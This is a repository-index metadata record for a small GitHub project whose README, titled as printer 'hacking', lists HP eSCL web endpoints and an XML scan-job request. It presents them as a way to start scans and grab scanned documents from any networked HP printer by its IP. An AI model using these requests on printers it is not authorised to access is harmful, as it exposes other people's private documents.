{"id":22343383,"url":"https://github.com/an0ncer/hp-scaner-server","last_synced_at":"2025-03-26T09:43:27.609Z","repository":{"id":183313059,"uuid":"588153378","full_name":"AN0NCER/hp-scaner-server","owner":"AN0NCER","description":"Scan documents from an HP printer with wifi access","archived":false,"fork":false,"pushed_at":"2023-01-20T23:23:49.000Z","size":13,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-31T11:15:58.319Z","etag":null,"topics":["hp","javascript","printer"],"latest_commit_sha":null,"homepage":"","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AN0NCER.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-01-12T13:05:18.000Z","updated_at":"2023-01-12T15:06:46.000Z","dependencies_parsed_at":"2023-07-23T22:43:06.493Z","dependency_job_id":null,"html_url":"https://github.com/AN0NCER/hp-scaner-server","commit_stats":null,"previous_names":["an0ncer/hp-scaner-server"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AN0NCER%2Fhp-scaner-server","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AN0NCER%2Fhp-scaner-server/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AN0NCER%2Fhp-scaner-server/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AN0NCER%2Fhp-scaner-server/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AN0NCER","download_url":"https://codeload.github.com/AN0NCER/hp-scaner-server/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245631617,"owners_count":20647184,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["hp","javascript","printer"],"created_at":"2024-12-04T08:15:56.461Z","updated_at":"2025-03-26T09:43:27.585Z","avatar_url":"https://github.com/AN0NCER.png","language":"JavaScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"# HP printer | Scanner | Hacking\nHP printers have a vulnerability with online requests. With these requests, you can intercept the data of scanned documents. Make a scan task. I can also send any documents for printing.\n\nTo receive data from the printer, you only need to know its ip, which is very easy to find.\n\nBasic requests:\n\n`http://192.168.31.187/eSCL/ScannerCapabilities`\n\n`http://192.168.31.187/DevMgmt/ProductStatusDyn.xml`\n\n`http://192.168.31.187/eSCL/ScannerStatus`\n\n`http://192.168.31.187/eSCL/ScanJobs` - POST\n\n```xml\n\u003cescl:ScanSettings xmlns:escl=\"http://schemas.hp.com/imaging/escl/2011/05/03\" xmlns:pwg=\"http://www.pwg.org/schemas/2010/12/sm\" xmlns:scan=\"http://schemas.hp.com/imaging/escl/2011/05/03\"\u003e\n  \u003cpwg:Version\u003e2.63\u003c/pwg:Version\u003e\n  \u003cpwg:ScanRegions\u003e\n    \u003cpwg:ScanRegion\u003e\n      \u003cpwg:Height\u003e3507\u003c/pwg:Height\u003e\n      \u003cpwg:ContentRegionUnits\u003eescl:ThreeHundredthsOfInches\u003c/pwg:ContentRegionUnits\u003e\n      \u003cpwg:Width\u003e2481\u003c/pwg:Width\u003e\n      \u003cpwg:XOffset\u003e0\u003c/pwg:XOffset\u003e\n      \u003cpwg:YOffset\u003e0\u003c/pwg:YOffset\u003e\n    \u003c/pwg:ScanRegion\u003e\n  \u003c/pwg:ScanRegions\u003e\n  \u003cpwg:DocumentFormat\u003eimage/jpeg\u003c/pwg:DocumentFormat\u003e\n  \u003cpwg:InputSource\u003ePlaten\u003c/pwg:InputSource\u003e\n  \u003cescl:XResolution\u003e200\u003c/escl:XResolution\u003e\n  \u003cescl:YResolution\u003e200\u003c/escl:YResolution\u003e\n  \u003cescl:ColorMode\u003eRGB24\u003c/escl:ColorMode\u003e\n  \u003cescl:Duplex\u003efalse\u003c/escl:Duplex\u003e\n\u003c/escl:ScanSettings\u003e\n\n```\n\n`http://192.168.31.187/eSCL/ScanJobs/f2nt7zvf-k59q-yk0h-1007-1odl0dbx/NextDocument`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fan0ncer%2Fhp-scaner-server","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fan0ncer%2Fhp-scaner-server","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fan0ncer%2Fhp-scaner-server/lists"}